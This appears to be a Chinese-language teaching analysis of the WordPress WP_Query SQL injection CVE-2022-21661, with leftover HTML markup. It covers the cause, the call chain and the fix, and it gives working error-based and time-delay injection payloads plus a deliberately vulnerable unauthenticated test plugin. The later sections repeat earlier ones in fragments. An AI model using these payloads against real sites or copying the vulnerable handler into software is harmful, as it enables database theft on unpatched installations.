WordPress核心框架WP_Query SQL注入漏洞分析(CVE-2022-21661)教学文档<\/h1>

漏洞概述<\/h2>
CVE-2022-21661是WordPress核心框架中的一个SQL注入漏洞，存在于WP_Query类中。该漏洞允许攻击者通过精心构造的查询参数执行任意SQL语句，可能导致数据泄露、数据篡改等安全问题。<\/p>

影响范围<\/h2>

WordPress版本：v4.1~v5.8.2<\/li>

修复版本：v5.8.3及以上<\/li> <\/ul>

漏洞原理<\/h2>

WP_Query类简介<\/h3>
WP_Query是WordPress定义的一个核心类，允许开发者编写自定义查询和使用不同参数展示文章。它可以直接查询WordPress数据库，在核心框架、插件和主题中广泛使用。<\/p>

漏洞触发点<\/h3>
漏洞主要存在于`WP_Tax_Query<\/code>类的clean_query()<\/code>和transform_query()<\/code>方法中，当满足特定条件时，用户输入的恶意SQL语句会被直接拼接到最终的SQL查询中。<\/p>`

漏洞触发条件<\/h3>

$query['include_children']<\/code>或is_taxonomy_hierarchical($query['taxonomy'])<\/code>为false<\/li>
$query['field']<\/code>值为term_taxonomy_id<\/code><\/li>
<\/ol>
漏洞利用流程<\/h3>

攻击者构造恶意JSON数据，通过tax_query<\/code>参数传递SQL注入payload<\/li>
数据被传递给WP_Query<\/code>构造函数<\/li>
在get_sql_for_clause()<\/code>方法中，恶意数据未被充分过滤<\/li>
恶意数据被直接拼接到SQL查询中执行<\/li>
<\/ol>
漏洞复现<\/h2>
测试环境<\/h3>

操作系统：Windows 7<\/li>
Web服务器：Apache 2.4.23<\/li>
PHP版本：5.6.27<\/li>
WordPress版本：5.8<\/li>
测试工具：Firefox + BurpSuite<\/li>
<\/ul>
复现步骤<\/h3>

在主题的functions.php<\/code>中添加测试代码：<\/li>
<\/ol>
function<\/span> wp_query_test<\/span>(){
<\/span><\/span>    echo<\/span> 'test-cve-2022-21661'<\/span>;
<\/span><\/span>    $inputData =<\/span> stripslashes<\/span>($_POST['data'<\/span>]);
<\/span><\/span>    $jsonDecodeInputData =<\/span> json_decode<\/span>($inputData,true<\/span>);
<\/span><\/span>    $wpTest =<\/span> new<\/span> WP_Query<\/span>($jsonDecodeInputData);
<\/span><\/span>    wp_die<\/span>();
<\/span><\/span>}
<\/span><\/span>add_action<\/span>('wp_ajax_nopriv_test'<\/span>,'wp_query_test'<\/span>,0<\/span>);
<\/span><\/span><\/code><\/pre>
开启WordPress调试模式（在wp-config.php<\/code>中）：<\/li>
<\/ol>
define<\/span>('WP_DEBUG'<\/span>, true<\/span>);
<\/span><\/span><\/code><\/pre>
发送恶意请求：<\/li>
<\/ol>
POST \/wp-admin\/admin-ajax.php HTTP\/1.1
Host: 127.0.0.1
Content-Type: application\/x-www-form-urlencoded

action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) and extractvalue(rand(),concat(0x5e,user(),0x5e))#"]}}}
<\/code><\/pre>
延时注入POC<\/h3>
当未开启调试模式时，可以使用延时注入：<\/p>
action=test&data={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["111) or (select sleep(2))#"]}}}
<\/code><\/pre>
漏洞分析<\/h2>
关键代码分析<\/h3>
漏洞位于wp-includes\/class-wp-tax-query.php<\/code>文件中的clean_query()<\/code>方法：<\/p>
private<\/span> function<\/span> clean_query<\/span>(&<\/span>$query) {
<\/span><\/span>    if<\/span> (empty<\/span>($query['taxonomy'<\/span>])) {
<\/span><\/span>        if<\/span> ('term_taxonomy_id'<\/span> !==<\/span> $query['field'<\/span>]) {
<\/span><\/span>            $query =<\/span> new<\/span> WP_Error<\/span>('invalid_taxonomy'<\/span>, __<\/span>('Invalid taxonomy.'<\/span>));
<\/span><\/span>            return<\/span>;
<\/span><\/span>        }
<\/span><\/span>        $query['include_children'<\/span>] =<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    $this-><\/span>transform_query<\/span>($query, 'term_taxonomy_id'<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>当$query['field']<\/code>为term_taxonomy_id<\/code>时，transform_query()<\/code>方法会直接返回，不对$query['terms']<\/code>进行过滤：<\/p>
protected<\/span> function<\/span> transform_query<\/span>(&<\/span>$query, $resulting_field) {
<\/span><\/span>    if<\/span> ($query['field'<\/span>] ==<\/span> $resulting_field) {
<\/span><\/span>        return<\/span>;
<\/span><\/span>    }
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>调用链分析<\/h3>

WP_Query<\/code>构造函数被调用<\/li>
调用query()<\/code>方法<\/li>
调用get_posts()<\/code>方法<\/li>
调用get_sql()<\/code>方法<\/li>
调用get_sql_clauses()<\/code>方法<\/li>
调用get_sql_for_query()<\/code>方法<\/li>
调用get_sql_for_clause()<\/code>方法<\/li>
调用clean_query()<\/code>方法<\/li>
调用transform_query()<\/code>方法（直接返回）<\/li>
恶意数据被拼接到SQL查询中<\/li>
<\/ol>
完整SQL注入语句<\/h3>
SELECT<\/span> SQL_CALC_FOUND_ROWS wp_posts.ID 
<\/span><\/span>FROM<\/span> wp_posts 
<\/span><\/span>LEFT<\/span> JOIN<\/span> wp_term_relationships ON<\/span> (wp_posts.ID =<\/span> wp_term_relationships.object_id) 
<\/span><\/span>WHERE<\/span> 1<\/span>=<\/span>1<\/span> 
<\/span><\/span>AND<\/span> (wp_term_relationships.term_taxonomy_id IN<\/span> (111<\/span>) and<\/span> extractvalue(rand(),concat(0<\/span>x5e,user<\/span>(),0<\/span>x5e))#<\/span>)) 
<\/span><\/span>AND<\/span> wp_posts.post_type IN<\/span> ('post'<\/span>, 'page'<\/span>, 'attachment'<\/span>) 
<\/span><\/span>AND<\/span> (wp_posts.post_status =<\/span> 'publish'<\/span> OR<\/span> wp_posts.post_status =<\/span> 'future'<\/span> OR<\/span> wp_posts.post_status =<\/span> 'draft'<\/span> OR<\/span> wp_posts.post_status =<\/span> 'pending'<\/span>) 
<\/span><\/span>GROUP<\/span> BY<\/span> wp_posts.ID 
<\/span><\/span>ORDER<\/span> BY<\/span> wp_posts.post_date DESC<\/span> 
<\/span><\/span>LIMIT<\/span> 0<\/span>, 10<\/span>
<\/span><\/span><\/code><\/pre>插件漏洞示例<\/h2>
可以创建一个测试插件来演示漏洞：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>\/*
<\/span><\/span><\/span>Plugin Name: CVE-2022-21661-test-plugin
<\/span><\/span><\/span>Description: Test plugin for CVE-2022-21661
<\/span><\/span><\/span>Version: 1.0
<\/span><\/span><\/span>Author: Test
<\/span><\/span><\/span>*\/<\/span>
<\/span><\/span>
<\/span><\/span>function<\/span> testSQLiCVE202221661<\/span>() {
<\/span><\/span>    $inputData =<\/span> stripslashes<\/span>($_POST['data'<\/span>]);
<\/span><\/span>    $jsonDecodeInputData =<\/span> json_decode<\/span>($inputData, true<\/span>);
<\/span><\/span>    $wpTest =<\/span> new<\/span> WP_Query<\/span>($jsonDecodeInputData);
<\/span><\/span>    wp_die<\/span>();
<\/span><\/span>}
<\/span><\/span>add_action<\/span>('wp_ajax_nopriv_testcve202221661'<\/span>, 'testSQLiCVE202221661'<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>修复方案<\/h2>
WordPress在5.8.3版本中修复了此漏洞，主要修改是在wp-includes\/class-wp-tax-query.php<\/code>中添加了对$query['terms']<\/code>的严格类型检查：<\/p>
$query['terms'<\/span>] =<\/span> wp_parse_id_list<\/span>( $query['terms'<\/span>] );
<\/span><\/span><\/code><\/pre>wp_parse_id_list()<\/code>函数确保$query['terms']<\/code>数组中的元素必须为整数。<\/p>
修复建议<\/h2>

立即升级到WordPress 5.8.3或更高版本<\/li>
检查所有自定义主题和插件中是否存在类似new WP_Query($untrusted_input)<\/code>的代码<\/li>
对所有用户输入进行严格验证和过滤<\/li>
<\/ol>
总结<\/h2>
CVE-2022-21661是WordPress核心框架中一个严重的SQL注入漏洞，影响范围广。漏洞利用条件相对宽松，攻击者可以通过多种方式构造恶意请求。建议所有WordPress用户立即升级到安全版本，并检查自定义代码中是否存在类似的安全隐患。<\/p>

WordPress核心框架WP_Query SQL注入漏洞分析(CVE-2022-21661)教学文档<\/h1>

漏洞概述<\/h2> CVE-2022-21661是WordPress核心框架中的一个SQL注入漏洞，存在于WP_Query类中。该漏洞允许攻击者通过精心构造的查询参数执行任意SQL语句，可能导致数据泄露、数据篡改等安全问题。<\/p>

漏洞原理<\/h2>

WP_Query类简介<\/h3> WP_Query是WordPress定义的一个核心类，允许开发者编写自定义查询和使用不同参数展示文章。它可以直接查询WordPress数据库，在核心框架、插件和主题中广泛使用。<\/p>

漏洞触发点<\/h3> 漏洞主要存在于WP_Tax_Query<\/code>类的clean_query()<\/code>和transform_query()<\/code>方法中，当满足特定条件时，用户输入的恶意SQL语句会被直接拼接到最终的SQL查询中。<\/p>

漏洞复现<\/h2>

漏洞分析<\/h2>

漏洞概述<\/h2>
CVE-2022-21661是WordPress核心框架中的一个SQL注入漏洞，存在于WP_Query类中。该漏洞允许攻击者通过精心构造的查询参数执行任意SQL语句，可能导致数据泄露、数据篡改等安全问题。<\/p>

WP_Query类简介<\/h3>
WP_Query是WordPress定义的一个核心类，允许开发者编写自定义查询和使用不同参数展示文章。它可以直接查询WordPress数据库，在核心框架、插件和主题中广泛使用。<\/p>

漏洞触发点<\/h3>
漏洞主要存在于`WP_Tax_Query<\/code>类的clean_query()<\/code>和transform_query()<\/code>方法中，当满足特定条件时，用户输入的恶意SQL语句会被直接拼接到最终的SQL查询中。<\/p>`